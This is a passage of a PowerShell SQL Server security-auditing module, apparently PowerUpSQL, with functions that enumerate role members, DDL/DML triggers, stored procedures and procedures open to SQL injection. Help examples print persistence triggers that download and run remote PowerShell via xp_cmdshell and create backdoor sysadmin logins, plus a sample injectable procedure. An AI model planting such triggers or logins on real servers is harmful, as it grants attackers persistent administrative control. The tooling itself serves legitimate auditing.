System.Data.DataTable\n\n        # Setup login filter\n        if ($PrincipalName)\n        {\n            $PrincipalNameFilter = \" AND USER_NAME(member_principal_id) like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n\n        # Setup role name\n        if ($RolePrincipalName)\n        {\n            $RolePrincipalNameFilter = \" AND USER_NAME(role_principal_id) like '$RolePrincipalName'\"\n        }\n        else\n        {\n            $RolePrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin or DBO privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get list of databases\n        if($NoDefaults)\n        {\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose\n        }\n\n        # Get roles for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Getting role members for the $DbName database...\"\n            }\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$DbName' as [DatabaseName],\n                role_principal_id as [RolePrincipalId],\n                USER_NAME(role_principal_id) as [RolePrincipalName],\n                member_principal_id as [PrincipalId],\n                USER_NAME(member_principal_id) as [PrincipalName]\n                FROM [$DbName].[sys].[database_role_members]\n                WHERE 1=1\n                $RolePrincipalNameFilter\n            $PrincipalNameFilter\"\n\n            # Execute Query\n            $TblDatabaseRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results\n            $TblDatabaseRoleMembers = $TblDatabaseRoleMembers + $TblDatabaseRoleMembersTemp\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblDatabaseRoleMembers\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLTriggerDdl\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLTriggerDdl\n{\n    <#\n            .SYNOPSIS\n            Returns DDL trigger information from target SQL Servers. This includes logon triggers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER TriggerName\n            Trigger name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLTriggerDdl -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName      : SQLServer1\n            Instance          : SQLServer1\\STANDARDDEV2014\n            TriggerName       : persistence_ddl_1\n            TriggerId         : 1104722988\n            TriggerType       : SERVER\n            ObjectType        : SQL_TRIGGER\n            ObjectClass       : SERVER\n            TriggerDefinition : -- Create the DDL trigger\n            CREATE Trigger [persistence_ddl_1]\n            ON ALL Server\n            FOR DDL_LOGIN_EVENTS\n            AS\n\n            -- Download and run a PowerShell script from the internet\n            EXEC master..xp_cmdshell 'Powershell -c \"IEX(new-object\n            net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'')\"';\n\n            -- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist\n            if (SELECT count(name) FROM sys.sql_logins WHERE name like 'SysAdmin_DDL') = 0\n\n            -- Create a login\n            CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'Password123!';\n\n            -- Add the login to the sysadmin fixed server role\n            EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin';\n\n            create_date       : 4/26/2016 8:34:49 PM\n            modify_date       : 4/26/2016 8:34:49 PM\n            is_ms_shipped     : False\n            is_disabled       : False\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLTriggerDdl -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Trigger name.')]\n        [string]$TriggerName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblDdlTriggers = New-Object -TypeName System.Data.DataTable\n\n        # Setup role name\n        if ($TriggerName)\n        {\n            $TriggerNameFilter = \" AND name like '$TriggerName'\"\n        }\n        else\n        {\n            $TriggerNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges to get all rows.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \" SELECT \t'$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            name as [TriggerName],\n            object_id as [TriggerId],\n            [TriggerType] = 'SERVER',\n            type_desc as [ObjectType],\n            parent_class_desc as [ObjectClass],\n            OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition],\n            create_date,\n            modify_date,\n            is_ms_shipped,\n            is_disabled\n            FROM [master].[sys].[server_triggers] WHERE 1=1\n        $TriggerNameFilter\"\n\n        # Execute Query\n        $TblDdlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append results\n        $TblDdlTriggers = $TblDdlTriggers  + $TblDdlTriggersTemp\n    }\n\n    End\n    {\n        # Return data\n        $TblDdlTriggers\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLTriggerDml\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLTriggerDml\n{\n    <#\n            .SYNOPSIS\n            Returns DML trigger information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER TriggerName\n            Trigger name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLTriggerDml -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName testdb\n\n            ComputerName           : SQLServer1\n            Instance               : SQLServer1\\STANDARDDEV2014\n            DatabaseName           : testdb\n            TriggerName            : persistence_dml_1\n            TriggerId              : 565577053\n            TriggerType            : DATABASE\n            ObjectType             : SQL_TRIGGER\n            ObjectClass            : OBJECT_OR_COLUMN\n            TriggerDefinition      : -- Create trigger\n            CREATE TRIGGER [persistence_dml_1]\n            ON testdb.dbo.NOCList\n            FOR INSERT, UPDATE, DELETE AS\n\n            -- Impersonate sa\n            EXECUTE AS LOGIN = 'sa'\n\n            -- Download a PowerShell script from the internet to memory and execute it\n            EXEC master..xp_cmdshell 'Powershell -c \"IEX(new-object\n            net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_dml.ps1'')\"';\n\n            -- Add a sysadmin named 'SysAdmin_DML' if it doesn't exist\n            if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0\n\n            -- Create a login\n            CREATE LOGIN SysAdmin_DML WITH PASSWORD = 'Password123!';\n\n            -- Add the login to the sysadmin fixed server role\n            EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin';\n\n            create_date            : 4/26/2016 8:58:28 PM\n            modify_date            : 4/26/2016 8:58:28 PM\n            is_ms_shipped          : False\n            is_disabled            : False\n            is_not_for_replication : False\n            is_instead_of_trigger  : False\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLTriggerDml -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Trigger name.')]\n        [string]$TriggerName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblDmlTriggers = New-Object -TypeName System.Data.DataTable\n\n        # Setup login filter\n        if ($TriggerName)\n        {\n            $TriggerNameFilter = \" AND name like '$TriggerName'\"\n        }\n        else\n        {\n            $TriggerNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges to get all rows.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Grabbing DML triggers from the databases below:.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get list of databases\n        $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose\n\n        # Get role for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : - $DbName\"\n            }\n\n            # Define Query\n            $Query = \"  use [$DbName];\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$DbName' as [DatabaseName],\n                name as [TriggerName],\n                object_id as [TriggerId],\n                [TriggerType] = 'DATABASE',\n                type_desc as [ObjectType],\n                parent_class_desc as [ObjectClass],\n                OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition],\n                create_date,\n                modify_date,\n                is_ms_shipped,\n                is_disabled,\n                is_not_for_replication,\n                is_instead_of_trigger\n                FROM [$DbName].[sys].[triggers] WHERE 1=1\n                $TriggerNameFilter\"\n\n            # Execute Query\n            $TblDmlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results\n            $TblDmlTriggers = $TblDmlTriggers + $TblDmlTriggersTemp\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblDmlTriggers\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLStoredProcedure\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLStoredProcedure\n{\n    <#\n            .SYNOPSIS\n            Returns stored procedures from target SQL Servers.\n            Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER ProcedureName\n            Procedure name to filter for.\n            .PARAMETER Keyword\n            Filter for procedures that include the keyword.\n            .PARAMETER AutoExec\n            Only select procedures that execute when the SQL Server service starts.\n            .PARAMETER NoDefaults\n            Filter out results from default databases.\n            .EXAMPLE\n            PS C:\\> Get-SQLStoredProcedure -Instance SQLServer1\\STANDARDDEV2014 -NoDefaults -DatabaseName testdb\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            DatabaseName        : testdb\n            SchemaName          : dbo\n            ProcedureName       : MyTestProc\n            ProcedureType       : PROCEDURE\n            ProcedureDefinition : CREATE PROC MyTestProc\n                                  WITH EXECUTE AS OWNER\n                                  as\n                                  begin\n                                  select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin\n                                  end\n            SQL_DATA_ACCESS     : MODIFIES\n            ROUTINE_BODY        : SQL\n            CREATED             : 7/24/2016 3:16:29 PM\n            LAST_ALTERED        : 7/24/2016 3:16:29 PM\n            is_ms_shipped       : False\n            is_auto_executed    : False\n\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLStoredProcedure -Verbose -NoDefaults\n    #>\n\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Procedure name.')]\n        [string]$ProcedureName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Filter for procedures that include the keyword.')]\n        [string]$Keyword,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Only include procedures configured to execute when SQL Server service starts.\")]\n        [switch]$AutoExec,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblProcs = New-Object -TypeName System.Data.DataTable\n\n        # Setup routine name filter\n        if ($ProcedureName)\n        {\n            $ProcedureNameFilter = \" AND ROUTINE_NAME like '$ProcedureName'\"\n        }\n        else\n        {\n            $ProcedureNameFilter = ''\n        }\n\n        # Setup ROUTINE_DEFINITION filter\n        if ($Keyword)\n        {\n            $KeywordFilter = \" AND ROUTINE_DEFINITION like '%$Keyword%'\"\n        }\n        else\n        {\n            $KeywordFilter = ''\n        }\n\n        # Setup AutoExec filter\n        if ($AutoExec)\n        {\n            $AutoExecFilter = \" AND is_auto_executed = 1\"\n        }\n        else\n        {\n            $AutoExecFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse ComputerName\n        If ($Instance)\n        {\n            $ComputerName = $Instance.split('\\')[0].split(',')[0]\n            $Instance = $Instance\n        }\n        else\n        {\n            $ComputerName = $env:COMPUTERNAME\n            $Instance = '.\\'\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Grabbing stored procedures from databases below:\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get role for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : - $DbName\"\n            }\n\n            # Define Query\n            $Query = \"  use [$DbName];\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                ROUTINE_CATALOG AS [DatabaseName],\n                ROUTINE_SCHEMA AS [SchemaName],\n                ROUTINE_NAME as [ProcedureName],\n                ROUTINE_TYPE as [ProcedureType],\n                ROUTINE_DEFINITION as [ProcedureDefinition],\n                SQL_DATA_ACCESS,\n                ROUTINE_BODY,\n                CREATED,\n                LAST_ALTERED,\n                b.is_ms_shipped,\n                b.is_auto_executed\n                FROM [INFORMATION_SCHEMA].[ROUTINES] a\n                JOIN [sys].[procedures]  b\n                ON a.ROUTINE_NAME = b.name\n                WHERE 1=1\n                $AutoExecFilter\n                $ProcedureNameFilter\n                $KeywordFilter\"\n\n            # Execute Query\n            $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results\n            $TblProcs = $TblProcs + $TblProcsTemp\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblProcs\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLStoredProcedureSQLi\n# ----------------------------------\n# Author: Scott Sutherland\n# Todo: Add column Procedure_Owner_Name\n# Todo: Add column owner Owner_Is_Sysadmin\n# Todo: Add is_ms_shipped and is_auto_executed to signed proc query\nFunction  Get-SQLStoredProcedureSQLi\n{\n    <#\n            .SYNOPSIS\n            Returns stored procedures containing dynamic SQL and concatenations that may suffer from SQL injection on target SQL Servers.\n            Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER ProcedureName\n            Procedure name to filter for.\n            .PARAMETER Keyword\n            Filter for procedures that include the keyword.\n            .PARAMETER OnlySigned\n            Filter for signed procedures.\n            .PARAMETER AutoExec\n            Only select procedures that execute when the SQL Server service starts.\n            .PARAMETER NoDefaults\n            Filter out results from default databases.\n            .EXAMPLE\n            PS C:\\> Get-SQLStoredProcedureSqli -Instance SQLServer1\\STANDARDDEV2014 -NoDefaults -DatabaseName testdb\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            DatabaseName        : testdb\n            SchemaName          : dbo\n            ProcedureName       : sp_sqli\n            ProcedureType       : PROCEDURE\n            ProcedureDefinition : -- Create procedure\n                                CREATE PROCEDURE sp_sqli\n                                @DbName varchar(max)\n                                WITH EXECUTE AS OWNER\n                                AS\n                                BEGIN\n                                Declare @query as varchar(max)\n                                SET @query = 'SELECT name FROM master..sysdatabases where name like ''%'+ @DbName+'%'' OR name=''tempdb''';\n                                EXECUTE(@query)\n                                END\n                                GO\n            SQL_DATA_ACCESS     : MODIFIES\n            ROUTINE_BODY        : SQL\n            CREATED             : 7/24/2016 3:16:29 PM\n            LAST_ALTERED        : 7/24/2016 3:16:29 PM\n            is_ms_shipped       : False\n            is_auto_executed    : False\n\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLStoredProcedureSqli -Verbose -NoDefaults\n    #>\n\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Procedure name.')]\n        [string]$ProcedureName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Filter for procedures that include the keyword.')]\n        [string]$Keyword,\n        \n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Filter for signed procedures.')]\n        [switch]$OnlySigned,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Only include procedures configured to execute when SQL Server service starts.\")]\n        [switch]$AutoExec,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblProcs = New-Object -TypeName System.Data.DataTable\n\n        # Setup routine name filter\n        if ($ProcedureName)\n        {\n            $ProcedureNameFilter = \" AND ROUTINE_NAME like '$ProcedureName'\"\n        }\n        else\n        {\n            $ProcedureNameFilter = ''\n        }\n\n        # Setup ROUTINE_DEFINITION filter\n        if ($Keyword)\n        {\n            $KeywordFilter = \" AND ROUTINE_DEFINITION like '%$Keyword%'\"\n        }\n        else\n        {\n            $KeywordFilter = ''\n        }\n\n        # Setup AutoExec filter\n        if ($AutoExec)\n        {\n            $AutoExecFilter = \" AND is_auto_executed = 1\"\n        }\n        else\n        {\n            $AutoExecFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse ComputerName\n        If ($Instance)\n        {\n            $ComputerName = $Instance.split('\\')[0].split(',')[0]\n            $Instance = $Instance\n        }\n        else\n        {\n            $ComputerName = $env:COMPUTERNAME\n            $Instance = '.\\'\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Checking databases below for vulnerable stored procedures:\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get role for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n\n                Write-Verbose -Message \"$Instance : - Checking $DbName database...\"\n\n            }\n\n            # Define Query\n            $Query = \"  use [$DbName];\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                ROUTINE_CATALOG AS [DatabaseName],\n                ROUTINE_SCHEMA AS [SchemaName],\n                ROUTINE_NAME as [ProcedureName],\n                ROUTINE_TYPE as [ProcedureType],\n                ROUTINE_DEFINITION as [ProcedureDefinition],\n                SQL_DATA_ACCESS,\n                ROUTINE_BODY,\n                CREATED,\n                LAST_ALTERED,\n                b.is_ms_shipped,\n                b.is_auto_executed\n                FROM [INFORMATION_SCHEMA].[ROUTINES] a\n                JOIN [sys].[procedures]  b\n                ON a.ROUTINE_NAME = b.name\n                WHERE 1=1 AND               \n                (ROUTINE_DEFINITION like '%sp_executesql%' OR\n                ROUTINE_DEFINITION like '%sp_sqlexec%' OR\n                ROUTINE_DEFINITION like '%exec @%' OR\n                ROUTINE_DEFINITION like '%execute @%' OR\n                ROUTINE_DEFINITION like '%exec (%' OR\n                ROUTINE_DEFINITION like '%exec(%' OR\n                ROUTINE_DEFINITION like '%execute (%' OR\n                ROUTINE_DEFINITION like '%execute(%' OR\n                ROUTINE_DEFINITION like '%''''''+%' OR\n                ROUTINE_DEFINITION like '%'''''' +%') \n                AND ROUTINE_DEFINITION like '%+%'\n                AND ROUTINE_CATALOG not like 'msdb' \n                $AutoExecFilter                              \n                $ProcedureNameFilter\n                $KeywordFilter\n                ORDER BY ROUTINE_NAME\"\n\n            # Define query for signed procedures\n            if($OnlySigned){\n                $Query = \"  use [$DbName];\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                spr.ROUTINE_CATALOG as DB_NAME,\n                spr.SPECIFIC_SCHEMA as SCHEMA_NAME,\n                spr.ROUTINE_NAME as SP_NAME,\n                spr.ROUTINE_DEFINITION as SP_CODE,\n                CASE cp.crypt_type\n                when 'SPVC' then cer.name\n                when 'CPVC' then Cer.name\n                when 'SPVA' then ak.name\n                when 'CPVA' then ak.name\n                END as CERT_NAME,\n                sp.name as CERT_LOGIN,\n                sp.sid as CERT_SID\n                FROM sys.crypt_properties cp\n                JOIN sys.objects o ON cp.major_id = o.object_id\n                LEFT JOIN sys.certificates cer ON cp.thumbprint = cer.thumbprint\n                LEFT JOIN sys.asymmetric_keys ak ON cp.thumbprint = ak.thumbprint\n                LEFT JOIN INFORMATION_SCHEMA.ROUTINES spr on spr.ROUTINE_NAME = o.name\n                LEFT JOIN sys.server_principals sp on sp.sid = cer.sid\n                WHERE o.type_desc = 'SQL_STORED_PROCEDURE'AND\n                (ROUTINE_DEFINITION like '%sp_executesql%' OR\n                ROUTINE_DEFINITION like '%sp_sqlexec%' OR\n                ROUTINE_DEFINITION like '%exec @%' OR\n                ROUTINE_DEFINITION like '%exec (%' OR\n                ROUTINE_DEFINITION like '%exec(%' OR\n                ROUTINE_DEFINITION like '%execute @%' OR\n                ROUTINE_DEFINITION like '%execute (%' OR\n                ROUTINE_DEFINITION like '%execute(%' OR\n                ROUTINE_DEFINITION like '%''''''+%' OR\n                ROUTINE_DEFINITION like '%'''''' +%') AND\n                ROUTINE_CATALOG not like 'msdb' AND \n                ROUTINE_DEFINITION like '%+%'\"\n            }\n\n            # Execute Query\n            $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Count results\n            $TblProcsCount = $TblProcsTemp.rows.count\n            Write-Verbose \"$Instance : - $TblProcsCount found in $DbName database\"\n\n            # Append results\n            $TblProcs = $TblProcs + $TblProcsTemp\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblProcs\n    }\n}\n\n# ----------------------------------\n#  